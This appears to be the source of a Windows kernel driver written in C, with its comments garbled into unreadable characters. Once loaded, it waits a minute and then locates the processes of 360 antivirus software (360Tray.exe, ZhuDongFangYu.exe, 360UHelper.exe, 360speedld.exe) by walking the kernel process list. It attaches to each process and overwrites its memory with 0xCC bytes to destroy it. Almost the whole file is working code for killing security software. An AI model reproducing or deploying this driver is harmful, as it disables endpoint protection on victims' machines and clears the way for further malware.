521 lines
11 KiB
C
521 lines
11 KiB
C
|
|
|||
|
|
#include <ntifs.h>
|
|||
|
|
|
|||
|
|
/// <09>ں˺<DABA><CBBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
NTKERNELAPI
|
|||
|
|
VOID
|
|||
|
|
KeAttachProcess(
|
|||
|
|
IN PRKPROCESS Process
|
|||
|
|
);
|
|||
|
|
|
|||
|
|
NTKERNELAPI
|
|||
|
|
VOID
|
|||
|
|
KeDetachProcess(
|
|||
|
|
VOID
|
|||
|
|
);
|
|||
|
|
|
|||
|
|
NTSYSAPI
|
|||
|
|
NTSTATUS
|
|||
|
|
NTAPI
|
|||
|
|
ZwQueryInformationProcess(
|
|||
|
|
__in HANDLE ProcessHandle,
|
|||
|
|
__in PROCESSINFOCLASS ProcessInformationClass,
|
|||
|
|
__out_bcount(ProcessInformationLength) PVOID ProcessInformation,
|
|||
|
|
__in ULONG ProcessInformationLength,
|
|||
|
|
__out_opt PULONG ReturnLength
|
|||
|
|
);
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
//// <09>ṹ<EFBFBD><E1B9B9>
|
|||
|
|
//PED<45><44>PTE<54>Ľṹ
|
|||
|
|
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>PAE<41><45>
|
|||
|
|
typedef struct _MMPTE_HARDWARE_PAE {
|
|||
|
|
ULONGLONG Valid : 1;
|
|||
|
|
ULONGLONG Write : 1; // UP version
|
|||
|
|
ULONGLONG Owner : 1;
|
|||
|
|
ULONGLONG WriteThrough : 1;
|
|||
|
|
ULONGLONG CacheDisable : 1;
|
|||
|
|
ULONGLONG Accessed : 1;
|
|||
|
|
ULONGLONG Dirty : 1;
|
|||
|
|
ULONGLONG LargePage : 1;
|
|||
|
|
ULONGLONG Global : 1;
|
|||
|
|
ULONGLONG CopyOnWrite : 1; // software field
|
|||
|
|
ULONGLONG Prototype : 1; // software field
|
|||
|
|
ULONGLONG reserved0 : 1; // software field
|
|||
|
|
ULONGLONG PageFrameNumber : 24;
|
|||
|
|
ULONGLONG reserved1 : 28; // software field
|
|||
|
|
} MMPTE_HARDWARE_PAE, *PMMPTE_HARDWARE_PAE;
|
|||
|
|
|
|||
|
|
typedef struct _MMPTE_PAE {
|
|||
|
|
union {
|
|||
|
|
MMPTE_HARDWARE_PAE Hard;
|
|||
|
|
} u;
|
|||
|
|
} MMPTE_PAE, *PMMPTE_PAE;
|
|||
|
|
|
|||
|
|
//δ<><CEB4><EFBFBD><EFBFBD>PAE<41><45>
|
|||
|
|
typedef struct _MMPTE_HARDWARE {
|
|||
|
|
ULONG Valid : 1;
|
|||
|
|
ULONG Write : 1; // UP version
|
|||
|
|
ULONG Owner : 1;
|
|||
|
|
ULONG WriteThrough : 1;
|
|||
|
|
ULONG CacheDisable : 1;
|
|||
|
|
ULONG Accessed : 1;
|
|||
|
|
ULONG Dirty : 1;
|
|||
|
|
ULONG LargePage : 1;
|
|||
|
|
ULONG Global : 1;
|
|||
|
|
ULONG CopyOnWrite : 1; // software field
|
|||
|
|
ULONG Prototype : 1; // software field
|
|||
|
|
ULONG reserved : 1; // software field
|
|||
|
|
ULONG PageFrameNumber : 20;
|
|||
|
|
} MMPTE_HARDWARE, *PMMPTE_HARDWARE;
|
|||
|
|
|
|||
|
|
typedef struct _MMPTE {
|
|||
|
|
union {
|
|||
|
|
MMPTE_HARDWARE Hard;
|
|||
|
|
} u;
|
|||
|
|
} MMPTE, *PMMPTE;
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
//// <09><>
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>PDE<44><45>PTE
|
|||
|
|
|
|||
|
|
#define PTE_BASE 0xC0000000
|
|||
|
|
#define PDE_BASE 0xC0300000
|
|||
|
|
#define PDE_BASE_PAE 0xc0600000
|
|||
|
|
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>PAE<41><45>
|
|||
|
|
#define MiGetPdeAddressPae(va) ((PMMPTE_PAE)(PDE_BASE_PAE + ((((ULONG)(va)) >> 21) << 3)))
|
|||
|
|
#define MiGetPteAddressPae(va) ((PMMPTE_PAE)(PTE_BASE + ((((ULONG)(va)) >> 12) << 3)))
|
|||
|
|
|
|||
|
|
//δ<><CEB4><EFBFBD><EFBFBD>PAE<41><45>
|
|||
|
|
#define MiGetPdeAddress(va) ((MMPTE*)(((((ULONG)(va)) >> 22) << 2) + PDE_BASE))
|
|||
|
|
#define MiGetPteAddress(va) ((MMPTE*)(((((ULONG)(va)) >> 12) << 2) + PTE_BASE))
|
|||
|
|
|
|||
|
|
//win7 32λ<32><CEBB>ActiveProcessLinks<6B><73>ƫ<EFBFBD><C6AB>
|
|||
|
|
#define ActiveProcessLinksOffset 0xB8
|
|||
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С
|
|||
|
|
#define ProcessNameSize 0x260
|
|||
|
|
//Ŀ<><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
//Tray<61><79>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD>Сд
|
|||
|
|
#define TargetProNameTarap L"360Tray.exe"
|
|||
|
|
#define TargetProNametarap L"360tray.exe"
|
|||
|
|
#define TargetProNameZDFY L"ZhuDongFangYu.exe"
|
|||
|
|
#define TargetProNameHel L"360UHelper.exe"
|
|||
|
|
#define TargetProNamesee L"360speedld.exe"
|
|||
|
|
|
|||
|
|
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>PAE<41><45>
|
|||
|
|
ULONG MmIsAddressValidExPae(
|
|||
|
|
IN PVOID Pointer
|
|||
|
|
)
|
|||
|
|
{
|
|||
|
|
MMPTE_PAE* Pde;
|
|||
|
|
MMPTE_PAE* Pte;
|
|||
|
|
|
|||
|
|
Pde = MiGetPdeAddressPae(Pointer);
|
|||
|
|
|
|||
|
|
if (Pde->u.Hard.Valid)
|
|||
|
|
{
|
|||
|
|
//<2F>ж<EFBFBD>PDE<44><45>ҳ<EFBFBD><D2B3><EFBFBD><EFBFBD>
|
|||
|
|
if (Pde->u.Hard.LargePage != 0)
|
|||
|
|
{
|
|||
|
|
Pte = Pde;
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
Pte = MiGetPteAddressPae(Pointer);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
if (Pte->u.Hard.Valid)
|
|||
|
|
{
|
|||
|
|
return TRUE;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
return FALSE;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
//δ<><CEB4><EFBFBD><EFBFBD>PAE<41><45>
|
|||
|
|
ULONG MmIsAddressValidExNotPae(
|
|||
|
|
IN PVOID Pointer
|
|||
|
|
)
|
|||
|
|
{
|
|||
|
|
MMPTE* Pde;
|
|||
|
|
MMPTE* Pte;
|
|||
|
|
|
|||
|
|
Pde = MiGetPdeAddress(Pointer);
|
|||
|
|
|
|||
|
|
if (Pde->u.Hard.Valid)
|
|||
|
|
{
|
|||
|
|
Pte = MiGetPteAddress(Pointer);
|
|||
|
|
|
|||
|
|
if (Pte->u.Hard.Valid)
|
|||
|
|
{
|
|||
|
|
return TRUE;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//Դ<><D4B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>PDE<44><45>ҳ<EFBFBD><D2B3><EFBFBD><EFBFBD>
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
return FALSE;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
//<2F>жϵ<D0B6>ַ<EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>Ч
|
|||
|
|
ULONG MiIsAddressValidEx(
|
|||
|
|
IN PVOID Pointer
|
|||
|
|
)
|
|||
|
|
{
|
|||
|
|
//<2F><>ַΪ<D6B7><CEAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ч
|
|||
|
|
if (!ARGUMENT_PRESENT(Pointer) ||
|
|||
|
|
!Pointer){
|
|||
|
|
return FALSE;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//// ҳ<><D2B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD>PAE
|
|||
|
|
ULONG uCR4 = 0;
|
|||
|
|
_asm{
|
|||
|
|
// mov eax, cr4
|
|||
|
|
__asm _emit 0x0F __asm _emit 0x20 __asm _emit 0xE0;
|
|||
|
|
mov uCR4, eax;
|
|||
|
|
}
|
|||
|
|
if (uCR4 & 0x20) {
|
|||
|
|
return MmIsAddressValidExPae(Pointer);
|
|||
|
|
}
|
|||
|
|
else {
|
|||
|
|
return MmIsAddressValidExNotPae(Pointer);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
return TRUE;
|
|||
|
|
|
|||
|
|
//<2F>˺<EFBFBD><CBBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ͬʱ<CDAC>ж<EFBFBD><D0B6>ں˶<DABA><CBB6><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>Ч<EFBFBD><D0A7>
|
|||
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD>ĵ<EFBFBD>ַҲ<D6B7><D2B2>һ<EFBFBD><D2BB>ҳ<EFBFBD><D2B3><EFBFBD><EFBFBD>ַ<EFBFBD><D6B7>
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
//ZeroProcessMemory<72><79><EFBFBD>ƻ<EFBFBD><C6BB><EFBFBD><EFBFBD>̿ռ<CCBF>
|
|||
|
|
BOOLEAN ZeroProcessMemory(ULONG EProcess)
|
|||
|
|
{
|
|||
|
|
ULONG ulVirtualAddr;
|
|||
|
|
BOOLEAN b_OK = FALSE;
|
|||
|
|
PVOID OverlayBuf = NULL;
|
|||
|
|
|
|||
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0xcc<63>ĸ<EFBFBD><C4B8>ǿռ<C7BF>
|
|||
|
|
OverlayBuf = ExAllocatePool(NonPagedPool, 0x1024);
|
|||
|
|
if (!OverlayBuf){
|
|||
|
|
return FALSE;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
memset(OverlayBuf, 0xcc, 0x1024);
|
|||
|
|
|
|||
|
|
//Attach<63><68>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
KeAttachProcess((PEPROCESS)EProcess);
|
|||
|
|
|
|||
|
|
//ѭ<><D1AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̿ռ<CCBF>
|
|||
|
|
for (ulVirtualAddr = 0; ulVirtualAddr <= 0x7fffffff; ulVirtualAddr += 0x1024)
|
|||
|
|
{
|
|||
|
|
if (MiIsAddressValidEx((PVOID)ulVirtualAddr))
|
|||
|
|
{
|
|||
|
|
__try
|
|||
|
|
{
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD>׳<EFBFBD><D7B3>쳣
|
|||
|
|
ProbeForWrite((PVOID)ulVirtualAddr, 0x1024, sizeof(ULONG));
|
|||
|
|
RtlCopyMemory((PVOID)ulVirtualAddr, OverlayBuf, 0x1024);
|
|||
|
|
b_OK = TRUE;
|
|||
|
|
}
|
|||
|
|
__except (EXCEPTION_EXECUTE_HANDLER){
|
|||
|
|
continue;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
else{
|
|||
|
|
if (ulVirtualAddr > 0x1000000) //<2F><><EFBFBD><EFBFBD>ô<EFBFBD><C3B4><EFBFBD>㹻<EFBFBD>ƻ<EFBFBD><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//<2F>˳<EFBFBD><CBB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̵Ŀռ<C4BF>
|
|||
|
|
KeDetachProcess();
|
|||
|
|
|
|||
|
|
//<2F>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>
|
|||
|
|
ExFreePool(OverlayBuf);
|
|||
|
|
|
|||
|
|
////<2F><>֤<EFBFBD><D6A4><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
//<2F><><EFBFBD>ַ<EFBFBD><D6B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɿ<EFBFBD>
|
|||
|
|
//Status = ObOpenObjectByPointer(
|
|||
|
|
// (PEPROCESS)EProcess,
|
|||
|
|
// OBJ_KERNEL_HANDLE,
|
|||
|
|
// 0,
|
|||
|
|
// GENERIC_READ,
|
|||
|
|
// NULL,
|
|||
|
|
// KernelMode,
|
|||
|
|
// &ProcessHandle
|
|||
|
|
// );
|
|||
|
|
|
|||
|
|
////<2F><><EFBFBD>̻<EFBFBD><CCBB><EFBFBD><EFBFBD>ڣ<EFBFBD><DAA3><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>
|
|||
|
|
//if (NT_SUCCESS(Status)){
|
|||
|
|
// ZwClose(ProcessHandle);
|
|||
|
|
// b_OK = FALSE;
|
|||
|
|
//}
|
|||
|
|
|
|||
|
|
|
|||
|
|
return b_OK;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
//·<><C2B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>
|
|||
|
|
void splitname(const PWCHAR szPath,PWCHAR * szfilename)
|
|||
|
|
{
|
|||
|
|
//<2F>Ӻ<EFBFBD><D3BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>
|
|||
|
|
|
|||
|
|
ULONG i;
|
|||
|
|
|
|||
|
|
i = 0;
|
|||
|
|
|
|||
|
|
i = wcslen(szPath);
|
|||
|
|
|
|||
|
|
while (szPath[i] != (WCHAR)'\\')
|
|||
|
|
i--;
|
|||
|
|
|
|||
|
|
i++;
|
|||
|
|
|
|||
|
|
|
|||
|
|
*szfilename = (PWCHAR)((ULONG)szPath + (i*2));
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
//ͨ<><CDA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
PEPROCESS GetEProcessByName(PUNICODE_STRING _ProcessName)
|
|||
|
|
{
|
|||
|
|
NTSTATUS st = STATUS_UNSUCCESSFUL;
|
|||
|
|
HANDLE hPro = NULL;
|
|||
|
|
PEPROCESS FounPro = NULL;
|
|||
|
|
|
|||
|
|
//<2F><>ϵͳ<CFB5><CDB3><EFBFBD>̿<EFBFBD>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD>
|
|||
|
|
PEPROCESS eProces = (PEPROCESS)IoGetCurrentProcess();
|
|||
|
|
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD>
|
|||
|
|
PLIST_ENTRY ListHead = (PLIST_ENTRY)((ULONG)eProces + ActiveProcessLinksOffset);
|
|||
|
|
//<2F><>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>
|
|||
|
|
PLIST_ENTRY Entry = ListHead->Flink;
|
|||
|
|
|
|||
|
|
PUNICODE_STRING pPath = (PUNICODE_STRING)ExAllocatePool(NonPagedPool, ProcessNameSize);
|
|||
|
|
|
|||
|
|
while (Entry != ListHead)
|
|||
|
|
{
|
|||
|
|
FounPro = (PEPROCESS)((ULONG)Entry - ActiveProcessLinksOffset);
|
|||
|
|
|
|||
|
|
Entry = Entry->Flink;
|
|||
|
|
if (Entry == NULL)
|
|||
|
|
{
|
|||
|
|
KdPrint(("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> \n"));
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
__try
|
|||
|
|
{
|
|||
|
|
|
|||
|
|
RtlZeroMemory(pPath, ProcessNameSize);
|
|||
|
|
|
|||
|
|
////<2F><>ȡ<EFBFBD>ȶ<EFBFBD><C8B6>Ľ<EFBFBD><C4BD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
st = ObOpenObjectByPointer(FounPro, OBJ_KERNEL_HANDLE, NULL, 0, NULL, KernelMode, &hPro);
|
|||
|
|
if (!NT_SUCCESS(st))
|
|||
|
|
{
|
|||
|
|
FounPro = NULL;
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
ULONG OutSize = 0;
|
|||
|
|
st = ZwQueryInformationProcess(hPro, ProcessImageFileName, pPath, ProcessNameSize, &OutSize);
|
|||
|
|
if (!NT_SUCCESS(st))
|
|||
|
|
{
|
|||
|
|
FounPro = NULL;
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>
|
|||
|
|
PWCHAR ProName = NULL;
|
|||
|
|
splitname(pPath->Buffer, &ProName);
|
|||
|
|
|
|||
|
|
KdPrint((("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>%ws \n"), ProName));
|
|||
|
|
|
|||
|
|
if (!wcscmp(_ProcessName->Buffer, ProName))
|
|||
|
|
{
|
|||
|
|
KdPrint(("<EFBFBD>ҵ<EFBFBD><EFBFBD><EFBFBD> \n"));
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
__except (EXCEPTION_EXECUTE_HANDLER)
|
|||
|
|
{
|
|||
|
|
FounPro = NULL;
|
|||
|
|
continue;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
FounPro = NULL;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
ZwClose(hPro);
|
|||
|
|
ExFreePool(pPath);
|
|||
|
|
ObDereferenceObject(eProces);
|
|||
|
|
|
|||
|
|
return FounPro;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
////<2F>жϽ<D0B6><CFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>Ч
|
|||
|
|
//<2F><><EFBFBD><EFBFBD>A-Protect<63><74>Դ<EFBFBD>룬<EFBFBD><EBA3AC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Բ<EFBFBD><D4B2><EFBFBD><EFBFBD>ɿ<EFBFBD>
|
|||
|
|
//BOOLEAN IsExitProcess(PEPROCESS Eprocess)
|
|||
|
|
//{
|
|||
|
|
// ULONG SectionObjectOffset = NULL;
|
|||
|
|
// ULONG SegmentOffset = NULL;
|
|||
|
|
// ULONG SectionObject;
|
|||
|
|
// ULONG Segment;
|
|||
|
|
// BOOLEAN b_OK = FALSE;
|
|||
|
|
//
|
|||
|
|
// __try
|
|||
|
|
// {
|
|||
|
|
// //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Win7 7000 <20><><EFBFBD><EFBFBD>ֱ<EFBFBD>Ӽ<EFBFBD>ƫ<EFBFBD><C6AB>
|
|||
|
|
//
|
|||
|
|
// if (MmIsAddressValidExPae(((ULONG)Eprocess + 0x128))){
|
|||
|
|
// SectionObject = *(PULONG)((ULONG)Eprocess + 0x128);
|
|||
|
|
//
|
|||
|
|
// if (MmIsAddressValidExPae(((ULONG)SectionObject + 0x14))){
|
|||
|
|
// Segment = *(PULONG)((ULONG)SectionObject + 0x14);
|
|||
|
|
//
|
|||
|
|
// if (MmIsAddressValidExPae(Segment)){
|
|||
|
|
// b_OK = TRUE; //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ч<EFBFBD><D0A7>
|
|||
|
|
// __leave;
|
|||
|
|
// }
|
|||
|
|
// }
|
|||
|
|
// }
|
|||
|
|
// }
|
|||
|
|
//
|
|||
|
|
// __except (EXCEPTION_EXECUTE_HANDLER){
|
|||
|
|
// //<2F><><EFBFBD><EFBFBD><EFBFBD>쳣
|
|||
|
|
// }
|
|||
|
|
// return b_OK;
|
|||
|
|
//
|
|||
|
|
// //<2F><><EFBFBD><EFBFBD><EFBFBD>ԣ<EFBFBD><D4A3><EFBFBD><EFBFBD>ַ<EFBFBD>ʽ<EFBFBD><CABD><EFBFBD>ɿ<EFBFBD><C9BF><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>Щ<EFBFBD><D0A9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̵<EFBFBD><CCB5>ڴ<EFBFBD><DAB4><EFBFBD><EFBFBD><EFBFBD>ΪNULL<4C><4C>
|
|||
|
|
//}
|
|||
|
|
|
|||
|
|
////DPC<50>ص<EFBFBD>
|
|||
|
|
//<2F>ѷ<EFBFBD>
|
|||
|
|
//VOID DpcForTimer(IN struct _KDPC *Dpc, IN PVOID DeferredContext,
|
|||
|
|
// IN PVOID SystemArgument1, IN PVOID SystemArgument2)
|
|||
|
|
//{
|
|||
|
|
// UNREFERENCED_PARAMETER(Dpc);
|
|||
|
|
// UNREFERENCED_PARAMETER(DeferredContext);
|
|||
|
|
// UNREFERENCED_PARAMETER(SystemArgument1);
|
|||
|
|
// UNREFERENCED_PARAMETER(SystemArgument2);
|
|||
|
|
//
|
|||
|
|
// _asm int 3;
|
|||
|
|
// //360Trap
|
|||
|
|
// GetProNameToKillProcess(TargetProNameTarap);
|
|||
|
|
//
|
|||
|
|
// //360trap
|
|||
|
|
// GetProNameToKillProcess(TargetProNametarap);
|
|||
|
|
//
|
|||
|
|
// //ZhuDongFangYu
|
|||
|
|
// GetProNameToKillProcess(TargetProNameZDFY);
|
|||
|
|
//
|
|||
|
|
// //360UHelper.exe
|
|||
|
|
// GetProNameToKillProcess(TargetProNameHel);
|
|||
|
|
//}
|
|||
|
|
|
|||
|
|
BOOLEAN GetProNameToKillProcess(PWCHAR ProName)
|
|||
|
|
{
|
|||
|
|
//<2F><><EFBFBD>ݽ<EFBFBD><DDBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD>EPROCESS
|
|||
|
|
UNICODE_STRING UName = RTL_CONSTANT_STRING(ProName);
|
|||
|
|
PEPROCESS eProcess = GetEProcessByName(&UName);
|
|||
|
|
if (eProcess != NULL)
|
|||
|
|
{
|
|||
|
|
if (ZeroProcessMemory((ULONG)eProcess)) // <09>ƻ<EFBFBD><C6BB><EFBFBD><EFBFBD>̿ռ<CCBF>
|
|||
|
|
{
|
|||
|
|
KdPrint((("<EFBFBD>ɹ<EFBFBD><EFBFBD>ɵ<EFBFBD> %ws \n"), ProName));
|
|||
|
|
return TRUE;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
return FALSE;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD>̵߳ȴ<CCB5>
|
|||
|
|
NTSTATUS ThreadProc()
|
|||
|
|
{
|
|||
|
|
//<2F>ȴ<EFBFBD>360<36><30><EFBFBD>ؽ<EFBFBD><D8BD>̴<EFBFBD><CCB4><EFBFBD> 60<36><30>
|
|||
|
|
//ʱ<>任<EFBFBD><E4BBBB>
|
|||
|
|
LARGE_INTEGER interval;
|
|||
|
|
interval.QuadPart = (-10 * 1000);
|
|||
|
|
interval.QuadPart *= 1000 * 60;
|
|||
|
|
KeDelayExecutionThread(KernelMode, FALSE, &interval);
|
|||
|
|
|
|||
|
|
//_asm int 3;
|
|||
|
|
|
|||
|
|
//360UHelper.exe
|
|||
|
|
GetProNameToKillProcess(TargetProNameHel);
|
|||
|
|
|
|||
|
|
//360UHelper.exe
|
|||
|
|
GetProNameToKillProcess(TargetProNamesee);
|
|||
|
|
|
|||
|
|
//ZhuDongFangYu
|
|||
|
|
GetProNameToKillProcess(TargetProNameZDFY);
|
|||
|
|
|
|||
|
|
//360Trap
|
|||
|
|
GetProNameToKillProcess(TargetProNameTarap);
|
|||
|
|
|
|||
|
|
//360trap
|
|||
|
|
GetProNameToKillProcess(TargetProNametarap);
|
|||
|
|
|
|||
|
|
// <20>˳<EFBFBD><CBB3>߳<EFBFBD>
|
|||
|
|
PsTerminateSystemThread(STATUS_SUCCESS);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
NTSTATUS UnLoadDriver(PDRIVER_OBJECT DriverObject)
|
|||
|
|
{
|
|||
|
|
UNREFERENCED_PARAMETER(DriverObject);
|
|||
|
|
return STATUS_SUCCESS;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegisterPath)
|
|||
|
|
{
|
|||
|
|
UNREFERENCED_PARAMETER(RegisterPath);
|
|||
|
|
DriverObject->DriverUnload = UnLoadDriver;
|
|||
|
|
|
|||
|
|
//<2F><>ӡ<EFBFBD><D3A1>Ϣ
|
|||
|
|
//_asm int 3;
|
|||
|
|
KdPrint(("<EFBFBD>ɹ<EFBFBD><EFBFBD>ƹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"));
|
|||
|
|
|
|||
|
|
|
|||
|
|
////<2F>ȴ<EFBFBD>360<36><30><EFBFBD>ؽ<EFBFBD><D8BD>̴<EFBFBD><CCB4><EFBFBD> 60<36><30>
|
|||
|
|
////ʱ<>任<EFBFBD><E4BBBB>
|
|||
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
//LARGE_INTEGER interval;
|
|||
|
|
//interval.QuadPart = (-10 * 1000);
|
|||
|
|
//interval.QuadPart *= 1000 * 60;
|
|||
|
|
//KeDelayExecutionThread(KernelMode, FALSE, &interval);
|
|||
|
|
|
|||
|
|
//////<2F>ȴ<EFBFBD>360<36><30><EFBFBD>ؽ<EFBFBD><D8BD>̴<EFBFBD><CCB4><EFBFBD> 60<36><30>
|
|||
|
|
////<2F><><EFBFBD><EFBFBD>DPC<50><43>ʱ<EFBFBD><CAB1>
|
|||
|
|
////<2F><>DPC<50><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD>IRQL<51><4C><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9>ObOpenObjectByPointer<65>Ⱥ<EFBFBD><C8BA><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
//PKTIMER pktimer = (PKTIMER)ExAllocatePoolWithTag(NonPagedPool, sizeof(KTIMER), 'RM');
|
|||
|
|
//PKDPC pKdpc = (PKDPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KDPC), 'RM');
|
|||
|
|
//KeInitializeDpc(pKdpc, (PKDEFERRED_ROUTINE)DpcForTimer, NULL);
|
|||
|
|
//KeInitializeTimerEx(pktimer, NotificationTimer);
|
|||
|
|
//
|
|||
|
|
//LARGE_INTEGER settime = { 0 };
|
|||
|
|
//settime.QuadPart = 60 * 1000000 * -10;
|
|||
|
|
//KeSetTimer(pktimer, settime, pKdpc);
|
|||
|
|
|
|||
|
|
//<2F>ȴ<EFBFBD>360<36><30><EFBFBD>ؽ<EFBFBD><D8BD>̴<EFBFBD><CCB4><EFBFBD> 60<36><30>
|
|||
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD>̲߳<DFB3><CCB2>ȴ<EFBFBD>
|
|||
|
|
HANDLE hThread = NULL;
|
|||
|
|
PsCreateSystemThread(&hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, ThreadProc, NULL);
|
|||
|
|
|
|||
|
|
ZwClose(hThread);
|
|||
|
|
return STATUS_SUCCESS;
|
|||
|
|
}
|